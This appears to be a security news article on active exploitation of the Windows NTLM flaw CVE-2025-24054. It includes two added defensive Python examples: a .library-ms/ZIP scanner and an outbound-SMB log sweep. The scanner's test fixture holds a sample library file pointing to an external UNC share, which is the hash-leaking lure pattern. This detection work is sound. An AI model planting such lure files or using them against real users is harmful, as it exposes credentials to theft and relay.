Windows NTLM Flaw Actively Exploited Just One Week After Patch Release, Check Point Warns
A critical Windows NTLM vulnerability, tracked as CVE-2025-24054 (CVSS score: 6.5), has come under active exploitation just one week after Microsoft issued a fix in its March 2025 Patch Tuesday update.
The flaw, which enables NTLM hash disclosure and potential spoofing attacks, requires minimal user interaction. A simple action like right-clicking a malicious file can trigger the vulnerability, exposing sensitive user authentication data.
According to Check Point, attackers began leveraging the flaw as early as March 19, targeting both governmental and private sector entities in Poland and Romania. The exploitation was typically carried out by luring users into extracting ZIP archives containing a malicious .library-ms file. Once accessed, the file silently triggered an SMB authentication request to a remote server, leaking the user's NTLM hash.
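The lure described above is a Windows library description file (.library-ms, an XML document whose `<simpleLocation><url>` elements name the folders the library points at). A mail gateway or file-share sweep can check such files for UNC locations on hosts it does not recognise, whether the file arrives inside a ZIP or on its own. The following scanner is an added example, not code from the article or from Check Point; the allowlist of trusted file servers, the entry names and the sample library contents are constructed, and 203.0.113.10 is a documentation address.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# UNC path: \\host\share or \\host. Group 1 captures the host.
UNC_RE = re.compile(r"^\\\\([^\\/]+)")

# Hypothetical allowlist of internal file servers a library may legitimately reference.
TRUSTED_HOSTS = {"fileserver01", "fileserver01.corp.example"}


def library_urls(xml_bytes):
    """Return the text of every <url> element in a .library-ms document."""
    root = ET.fromstring(xml_bytes)
    return [el.text.strip() for el in root.iter()
            if el.tag.rsplit("}", 1)[-1] == "url" and el.text]


def untrusted_unc_hosts(xml_bytes):
    """Hosts named by UNC locations in the library that are not on the allowlist."""
    hosts = []
    for url in library_urls(xml_bytes):
        m = UNC_RE.match(url)
        if m and m.group(1).lower() not in TRUSTED_HOSTS:
            hosts.append(m.group(1))
    return hosts


def scan_zip(zip_bytes):
    """Map each .library-ms entry in a ZIP to the untrusted hosts it references."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            try:
                hosts = untrusted_unc_hosts(zf.read(name))
            except ET.ParseError:
                hosts = ["<unparseable XML>"]  # a broken library file is worth a look too
            if hosts:
                findings[name] = hosts
    return findings


# Constructed samples, not real lure content. The library points at a UNC share
# on a documentation address, which an internal allowlist would not recognise.
SUSPICIOUS_LIBRARY = rb"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\203.0.113.10\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

BENIGN_LIBRARY = rb"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\fileserver01\docs</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""


def build_sample_zip():
    """Build an in-memory ZIP holding one suspicious and one benign library file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.library-ms", SUSPICIOUS_LIBRARY)
        zf.writestr("Documents.library-ms", BENIGN_LIBRARY)
        zf.writestr("readme.txt", "plain text entry, ignored")
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_zip(build_sample_zip()))  # {'invoice.library-ms': ['203.0.113.10']}
```

`untrusted_unc_hosts` is the check to run on a .library-ms received on its own; `scan_zip` applies it to every matching archive entry. The tag comparison strips the XML namespace so a file that omits it is still inspected, and an unparseable library file is reported rather than silently skipped.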
These stolen hashes can be brute-forced to obtain passwords or used in relay attacks, potentially allowing lateral movement, privilege escalation, and full domain compromise—depending on the privileges of the targeted account.
Although Microsoft did not confirm active exploitation in its advisory, Check Point observed about a dozen attack campaigns between March 19 and March 25. NTLM hash data was routed through SMB servers in countries like Australia, Russia, Turkey, and the Netherlands.
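Because the leaked hash travels over an outbound SMB connection to a server outside the victim's network, an allowed workstation-to-Internet connection on TCP/445 is itself a strong signal, and blocking outbound SMB at the perimeter is the standard mitigation. The sweep below is an added example, not part of the article or Check Point's report; the key=value log format and the records are constructed, and the addresses are RFC 1918 and documentation ranges.

```python
import ipaddress
import re

# Explicit RFC 1918 ranges. Python's IPv4Address.is_private also treats the
# documentation ranges (e.g. 203.0.113.0/24, used in the sample below) as
# non-global, so an explicit list of internal networks is used instead.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SMB_PORTS = {445, 139}
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def is_internal(ip):
    """True if the address falls inside one of the internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line):
    """Parse a key=value firewall record (constructed format) into a dict."""
    return dict(FIELD_RE.findall(line))


def outbound_smb_alerts(lines):
    """Return (src, dst, dport) for allowed SMB connections from inside to outside."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        try:
            dport = int(rec["dport"])
            if (rec["action"] == "allow" and dport in SMB_PORTS
                    and is_internal(rec["src"]) and not is_internal(rec["dst"])):
                alerts.append((rec["src"], rec["dst"], dport))
        except (KeyError, ValueError):
            continue  # malformed record: skip it rather than abort the sweep
    return alerts


# Constructed sample records: one allowed external SMB connection (the alert),
# one internal SMB connection, one HTTPS connection, and one denied attempt.
SAMPLE_LOG = [
    "ts=2025-03-19T10:02:11Z action=allow src=10.20.1.15 dst=203.0.113.10 proto=tcp dport=445",
    "ts=2025-03-19T10:02:12Z action=allow src=10.20.1.15 dst=10.20.1.5 proto=tcp dport=445",
    "ts=2025-03-19T10:03:01Z action=allow src=10.20.1.22 dst=198.51.100.7 proto=tcp dport=443",
    "ts=2025-03-19T10:04:40Z action=deny src=10.20.1.30 dst=192.0.2.44 proto=tcp dport=445",
    "garbage line with no fields",
]

if __name__ == "__main__":
    for src, dst, dport in outbound_smb_alerts(SAMPLE_LOG):
        print(f"outbound SMB from {src} to {dst}:{dport}")
```

Only allowed connections are reported: the denied record in the sample is the perimeter rule doing its job, and on a network where outbound 445 is already blocked the deny events themselves are the ones worth correlating with the user who opened the archive.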
One campaign even included links to archives containing files associated with previous NTLM vulnerabilities, including CVE-2024-43451, previously exploited by Russian APT group Fancy Bear (aka APT28, Forest Blizzard, Sofacy).
In some cases, the .library-ms file was shared outside of ZIP archives, making it even easier to spread.
On April 17, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-24054 to its Known Exploited Vulnerabilities (KEV) catalog. In line with Binding Operational Directive 22-01, federal agencies must patch the flaw by May 8. However, CISA strongly encourages all organizations to urgently address vulnerabilities listed in the KEV to prevent compromise.